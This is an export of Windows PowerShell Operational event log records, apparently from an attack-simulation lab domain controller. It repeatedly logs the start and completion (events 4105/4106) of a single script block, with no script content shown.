06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475332
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475331
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475330
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475329
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475328
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475327
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475326
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475325
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475324
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475323
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475322
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475321
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475320
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475318
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475317
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475316
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475315
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475314
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475313
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475312
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475311
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475310
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475309
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475308
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475307
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475306
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475305
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475304
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475303
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475302
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475301
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475300
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475299
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475298
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475297
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475296
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475295
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475294
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475293
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475292
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475291
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475290
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475289
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475288
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475287
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475286
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475285
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475284
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475283
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475282
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475281
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475280
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475279
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475278
Keywords=None
